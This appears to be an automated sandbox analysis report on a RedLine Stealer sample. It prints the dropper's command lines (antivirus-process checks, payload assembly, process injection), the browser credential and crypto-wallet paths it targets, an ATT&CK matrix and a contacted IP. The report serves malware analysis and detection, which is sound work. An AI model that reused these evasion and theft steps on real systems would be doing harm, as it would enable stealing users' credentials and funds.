                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 154571Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "TRUEANALOGMINDOC" Pepper Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Lt + Blake + Tranny + Category 154571\iJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\154571\Eco.pif 154571\Eco.pif 154571\iJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifProcess created: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifProcess created: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_005686B0 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,14_2_005686B0
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00574D89 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,14_2_00574D89
                    Source: MmReveals.exe, 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp, MmReveals.exe, 00000003.00000002.1750600445.00000000028A5000.00000004.00000020.00020000.00000000.sdmp, Eco.pif, 0000000E.00000000.1699550344.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: Eco.pifBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0053878B cpuid 14_2_0053878B
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0057E0CA GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,14_2_0057E0CA
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00550652 GetUserNameW,14_2_00550652
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0054409A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,14_2_0054409A
                    Source: C:\StrLocalGate\MmReveals.exeCode function: 3_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,3_2_00406805
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: RegAsm.exe, 00000014.00000002.2584603940.00000000058DB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2585074100.0000000005942000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 14.3.Eco.pif.486a450.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000003.2257485805.0000000004EC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2257260838.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2315350794.0000000004823000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2317192962.000000000497F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2565104285.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2259828700.0000000004821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2266853177.0000000003F2B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2316981318.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2260248187.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2266944790.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2259567795.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2260441214.000000000497F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2260351843.0000000004EDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2266772468.0000000003EA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2317320057.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2260198982.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2260600980.0000000004821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2257336074.000000000497F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2259618326.000000000486B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2259650438.000000000497F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2260600980.0000000004861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2259764346.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Eco.pif PID: 2004, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4856, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $kq1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: RegAsm.exe, 00000014.00000002.2584603940.00000000058DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\*
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.walletLRkq`u
                    Source: RegAsm.exe, 00000014.00000002.2584603940.00000000058DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\wallets\*
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusE#
                    Source: RegAsm.exe, 00000014.00000002.2584603940.00000000058DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\*app-store*p
                    Source: RegAsm.exe, 00000014.00000002.2584603940.00000000058DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\wallets\*
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $kq&%localappdata%\Coinomi\Coinomi\walletsLRkq
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $kq5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: Eco.pifBinary or memory string: WIN_81
                    Source: Eco.pifBinary or memory string: WIN_XP
                    Source: Eco.pifBinary or memory string: WIN_XPe
                    Source: Eco.pif.5.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyteP
                    Source: Eco.pifBinary or memory string: WIN_VISTA
                    Source: Eco.pifBinary or memory string: WIN_7
                    Source: Eco.pifBinary or memory string: WIN_8
                    Source: Yara matchFile source: 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4856, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 14.3.Eco.pif.486a450.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000003.2257485805.0000000004EC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2257260838.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2315350794.0000000004823000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2317192962.000000000497F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2565104285.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2259828700.0000000004821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2266853177.0000000003F2B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2316981318.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2260248187.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2266944790.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2259567795.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2260441214.000000000497F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2260351843.0000000004EDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2266772468.0000000003EA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2317320057.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2260198982.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2260600980.0000000004821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2257336074.000000000497F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2259618326.000000000486B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2259650438.000000000497F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2260600980.0000000004861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2259764346.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Eco.pif PID: 2004, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4856, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00586733 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,14_2_00586733
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00586BF7 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,14_2_00586BF7

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts                    		221
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    Exploitation for Privilege Escalation                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts3
                    Native API                    		2
                    Valid Accounts                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol3
                    Data from Local System                    		1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    Command and Scripting Interpreter                    		Logon Script (Windows)2
                    Valid Accounts                    		2
                    Obfuscated Files or Information                    		Security Account Manager2
                    File and Directory Discovery                    		SMB/Windows Admin Shares21
                    Input Capture                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Access Token Manipulation                    		1
                    Software Packing                    		NTDS127
                    System Information Discovery                    		Distributed Component Object Model3
                    Clipboard Data                    		1
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection                    		1
                    DLL Side-Loading                    		LSA Secrets361
                    Security Software Discovery                    		SSHKeylogging11
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                    Masquerading                    		Cached Domain Credentials241
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Valid Accounts                    		DCSync4
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
                    Virtualization/Sandbox Evasion                    		Proc Filesystem1
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                    Access Token Manipulation                    		/etc/passwd and /etc/shadow3
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                    Process Injection                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483221 Sample: be5bb7f05c4f8de4d393134b63a... Startdate: 26/07/2024 Architecture: WINDOWS Score: 72 65 WTYoyXMgGLmyIq.WTYoyXMgGLmyIq 2->65 71 Found malware configuration 2->71 73 Antivirus / Scanner detection for submitted sample 2->73 75 Multi AV Scanner detection for dropped file 2->75 77 6 other signatures 2->77 11 be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe 2 2->11         started        signatures3 process4 file5 53 be5bb7f05c4f8de4d3...6bf8a05e3ad3fb3.tmp, PE32 11->53 dropped 14 be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp 5 16 11->14         started        process6 file7 57 C:\StrLocalGate\is-RISCU.tmp, PE32 14->57 dropped 59 C:\StrLocalGate\MmReveals.exe (copy), PE32 14->59 dropped 61 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 14->61 dropped 63 2 other files (none is malicious) 14->63 dropped 17 MmReveals.exe 68 14->17         started        21 Setup.exe 2 14->21         started        process8 file9 45 C:\Users\user\AppData\Local\Temp45d, PDP-11 17->45 dropped 69 Found stalling execution ending in API Sleep call 17->69 23 cmd.exe 3 17->23         started        47 C:\Users\user\AppData\Local\...\Setup.tmp, PE32 21->47 dropped 27 Setup.tmp 3 12 21->27         started        signatures10 process11 file12 49 C:\Users\user\AppData\Local\Temp\...co.pif, PE32 23->49 dropped 79 Drops PE files with a suspicious file extension 23->79 29 Eco.pif 1 23->29         started        33 cmd.exe 2 23->33         started        35 conhost.exe 23->35         started        37 7 other processes 23->37 51 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 27->51 dropped signatures13 process14 file15 55 C:\Users\user\AppData\Local\...\RegAsm.exe, PE32 29->55 dropped 91 Found stalling execution ending in API Sleep call 29->91 93 Writes to foreign memory regions 29->93 95 Injects a PE file into a foreign processes 29->95 39 RegAsm.exe 5 4 29->39         started        43 RegAsm.exe 29->43         started        signatures16 process17 dnsIp18 67 45.140.147.183, 12245, 49737 SYNLINQsynlinqdeDE United Kingdom 39->67 81 Found many strings related to Crypto-Wallets (likely being stolen) 39->81 83 Tries to harvest and steal browser information (history, passwords, etc) 39->83 85 Tries to steal Crypto Currency Wallets 39->85 87 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 43->87 89 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 43->89 signatures19

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe37%ReversingLabsWin32.Spyware.Redline
                    be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe100%AviraHEUR/AGEN.1333109

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Program Files (x86)\StrLocalGate\Setup.exe (copy)0%ReversingLabs
                    C:\Program Files (x86)\StrLocalGate\is-RI2MT.tmp0%ReversingLabs
                    C:\StrLocalGate\MmReveals.exe (copy)39%ReversingLabsWin32.Trojan.Generic
                    C:\StrLocalGate\is-RISCU.tmp39%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Local\Temp\154571\Eco.pif0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-M0QJK.tmp\_isetup\_setup64.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-SR5HU.tmp\_isetup\_setup64.tmp0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/sc/sct0%URL Reputationsafe
                    https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk0%URL Reputationsafe
